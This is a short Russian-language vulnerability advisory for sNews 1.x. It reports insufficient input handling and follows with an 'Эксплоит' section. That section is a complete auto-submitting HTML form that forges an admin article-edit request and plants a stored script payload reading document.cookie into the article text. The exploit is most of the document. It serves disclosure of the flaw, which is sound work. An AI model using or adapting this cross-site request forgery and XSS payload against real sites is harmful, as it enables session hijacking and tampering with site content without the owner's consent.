Программа: sNews 1.x

Уязвимость позволяет удаленному пользователю выполнить XSS нападение на
целевую систему. Уязвимость существует из-за недостаточной обработки входных
данных передаваемых через HTTP запросы. Атакующий может выполнить произвольный
сценарий в браузере жертвы в контексте безопасности уязвимого сайта.

Эксплоит:

<form action="http://host/?action=process&task=admin_article&id=2"
method="post" name="main" >

<input type="hidden" name="title" value="article title" />
<input type="hidden" name="seftitle" value="sefurl" />
<input type="hidden" name="text" value='article text"><script>alert(document.cookie)</script>'
/>
<input type="hidden" name="define_category" value="1" />
<input type="hidden" name="publish_article" value="on" />
<input type="hidden" name="position" value="1" />
<input type="hidden" name="description_meta" value="desc" />
<input type="hidden" name="keywords_meta" value="key" />
<input type="hidden" name="display_title" value="on" />
<input type="hidden" name="display_info" value="on" />
<input type="hidden" name="fposting_day" value="29" />
<input type="hidden" name="fposting_month" value="9" />
<input type="hidden" name="fposting_year" value="2010" />
<input type="hidden" name="fposting_hour" value="16" />
<input type="hidden" name="fposting_minute" value="40" />
<input type="hidden" name="task" value="admin_article" />
<input type="hidden" name="edit_article" value="Edit" />
<input type="hidden" name="article_category" value="1" />
<input type="hidden" name="id" value="2" />

</form>
<script>
document.main.submit();
</script>



Оставить мнение